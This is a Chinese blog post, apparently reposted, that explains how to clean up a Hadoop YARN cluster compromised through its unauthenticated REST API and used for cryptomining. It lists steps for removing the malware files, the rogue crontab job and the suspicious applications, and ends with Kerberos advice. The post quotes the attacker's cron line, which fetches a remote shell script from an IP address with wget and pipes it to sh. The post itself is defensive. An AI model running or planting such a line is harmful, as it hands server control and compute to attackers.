yarn一直在跑一个用户为dr.who的application

最新推荐文章于 2024-07-11 00:29:13 发布
最新推荐文章于 2024-07-11 00:29:13 发布
阅读量360 收藏
点赞数
文章标签: java 大数据
原文链接:http://www.cnblogs.com/daxiangfei/p/9198856.html
版权

现象:

访问yarn:8088页面发现一直有任务在跑如图:

用户为dr.who,问下内部使用人员,都没有任务在跑;

结论:

恭喜你,你中毒了,攻击者利用Hadoop Yarn资源管理系统REST API未授权漏洞对服务器进行攻击,攻击者可以在未授权的情况下远程执行代码的安全问题进行预警

用top命令发现cpu使用了360%多,系统会很卡。

解决办法:

1,通过查看占用cpu高得进程,kill掉此进程

2,检查/tmp和/var/tmp目录,删除java、ppc、w.conf等异常文件

3 ,通过crontab -l 查看有一个* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1任务,删除此任务

4,排查YARN日志,确认异常的application,删除处理

再通过top验证看是否还有高cpu进程,如果有,kill掉,没有的话应该正常了。

注意:YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当,REST API将会开放在公网导致未授权访问的问题,那么任何黑客则就均可利用其进行远程命令执行,从而进行挖矿等行为,黑客直接利用开放在8088的REST API提交执行命令,来实现在服务器内下载执行.sh脚本,从而再进一步下载启动挖矿程序达到挖矿的目的,因此注意并启用Kerberos认证功能,禁止匿名访问修改8088端口

 

 

转载于:https://www.cnblogs.com/daxiangfei/p/9198856.html

weixin_33738578
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
问题:yarn中有top 定期出来占用大量资源
向北的博客
03-25 596
问题:top命令 定期 ,启动占用大量资源 pid 15290 top /tmp/.system/top (deleted) 工作目录 /opt/mydata103/yarn/nm/usercache/root/appcache/application_1616400055261_0803/container_1616400055261_0803_01_000001 6 /tmp/.system//top -c /tmp/.system//config.json ...
日常问题系列——yarn web ui提供kill application功能;登录用户为dr.who,无法查看application运行情况
njuptcyd的博客
05-10 4108
问题一、yarn web ui界面没有办法查看application具体运行情况 Yarn Web UI界面效果如下: 点击一个running 状态的application,会显示如下信息: You (User dr.who) are not authorized to view application application_1557385812521_0002 原因及解决方法 dr.who...
YARN】问题汇总(持续更新)
lin86182824的博客
07-29 2509
1、TEZ一直卡主 原因是:集群的 mapreduce.map.cpu.vcores 改成了 4,hive 默认会使用这个参数作为 tez container 的 vcores。tez vcores 大于 1 时会导致无法正常启动 container,可以设置参数 hive.tez.cpu.vcores=1 来解决。 ......
Hadoop漏洞被传挖矿病毒(/tmp/kdevtmpfsi kinsing)
lucas5的博客
12-21 360
大数据服务器,被病毒挖矿。
继续深挖挖矿病毒solr中毒途径
flye的专栏
02-23 491
今天突然通过grafana 集群的网卡流量异常,查看hadoop集群有dr.who用户执行yarn 任务。
jdk1.8+yarn-1.22.10.tar.gz
01-03
JDK 1.8是Oracle公司发布的Java开发工具包的一个重要版本,它引入了许多新特性,显著提升了开发效率和程序性能。以下是JDK 1.8的一些核心特性: 1. **Lambda表达式**:JDK 1.8引入了函数式编程的概念,通过lambda...
yarn1.22.4与1.22.5最新安装包windows
09-02
总结来说,Yarn 1.22.4和1.22.5为Windows用户提供了一种高效且可靠的JavaScript包管理方案,通过选择合适的安装方法,并利用其独特的特性和功能,可以优化项目管理和开发流程。确保定期更新Yarn以获取最新的改进和...
yarn-v1.22.5.tar.gz
09-14
总结来说,Yarn-v1.22.5 是一个为提高 JavaScript 开发效率和项目稳定性而设计的包管理工具,它通过缓存、锁定文件、并行下载等策略,解决了 npm 的一些痛点,为开发者带来了更高效、可靠和安全的包管理体验。
YARN Application Development.
06-29
YARN(Yet Another Resource Negotiator)是 Hadoop 生态系统中的一个关键组件,它为大规模分布式应用程序提供资源管理和调度的功能。相较于传统的 MapReduce 架构,YARN 能够更好地支持多种计算框架和数据处理任务...
Hadoop基础之《(8)—yarn dr.who用户漏洞被挖矿》
csj50的专栏
01-31 848
dr.who用户执行了很多application,服务器被挖矿。因为yarn的8088端口REST API没有做权限控制,允许任意用户通过API创建任务。5、服务器上在/var/tmp/下就写入了11112222_test_11112222文件。1、检查/tmp和/var/tmp目录,删除异常文件。2、检查crontab -l,删除可疑脚本。2、构建json文件。
升腾威讯怎么恢复集群_集群被入侵,YARN一直dr.who用户application
weixin_42297675的博客
12-13 212
国庆期间也没学习,早上想着打开集群看看,弄弄东西。10月2号早上7点,一个叫dr.who的用户,通过一个yarn应用想要get-shell??失败了还好,成功了我这个集群岂不是落到了他的手中?这个web界面默认是8088端口,这个web是可以访问到集群的(不然怎么获得数据)通过web界面登录的用户一个普通用户,但是可以获得集群的信息,这是hadoop的一个默认用户,而通过这个用户想要我集群的sh...
Hadoop生态漏洞修复记录
manweizhizhuxia的博客
03-28 3055
Hadoop、zookeeper、hive漏洞修复
hadoop漏洞病毒入侵过程
nanfeng_fable的博客
12-18 434
hadoop漏洞病毒入侵过程
03、Kerberos安全认证之配置和访问Kerberos安全认证的Hadoop集群学习笔记
最新发布
每个人都是独一无二的,把握好自己的节奏,跟着自己的心走。
07-11 842
03、Kerberos安全认证之配置和访问Kerberos安全认证的Hadoop集群学习笔记
ZooKeeper 授权访问
weixin_30505751的博客
07-08 995
ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。 ZooKeeper的目标就是封装好复杂易出错的关键服务,将简单易用的接口和性能高效、功能稳定的系统提供给用户。 在通常情况下,zookeeper允许...
服务器被植入挖矿木马程序纪实(第二次)
andyguan01_2的博客
05-07 6427
今天这篇文章的标题是“服务器被植入挖矿木马程序纪实(第二次)”,为什么加了个“第二次”,因为之前已经发生过一次(可点此查看:服务器被植入挖矿木马程序纪实)。当时只是解决了问题,没有找到根本原因,这次又碰到了,情形和上次略有不同,好在最终找到了原因所在,下面细细说来。 一、发现问题 首先是接到运维同事告知,说服务器有频繁的异常请求,导致端口访问被服务商阻断: 二、解决问题 有了上次的经验,首先查看...
CDH6.3.2解决yarn historyServer页面为空,登录用户为Logged in as: dr.who的问题
nhm_lxy的专栏
04-12 313
Logged in as: dr.who,yarn,jobHistory,CDH6.3.2
yarn一直自动生成用户为dr.who的application
weixin_43300503的博客
03-02 3016
之前用三台云服务器搭建完集群后发现任务运行的特别慢 yarn:8088页面后发现有很多奇怪的任务在 而且这些任务怎么都完不成还一直在生成,查看各种log日志怎么也没有exception。 后来看了https://www.cnblogs.com/daxiangfei/p/9198856.html 才发现原来是被攻击了。 查看进程发现cup占用异常的高应该是黑客用机器去挖矿了。。。。。 解决方法: ...
yarn-default.xml这个文件在哪个路径下了
07-13
`yarn-default.xml`文件通常...此命令将在`/etc`目录中递归搜索名为`yarn-default.xml`的文件,并显示文件的路径。如果文件存在,您将能够看到其完整路径。如果找不到该文件,请尝试检查Hadoop的安装和配置是否正确。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值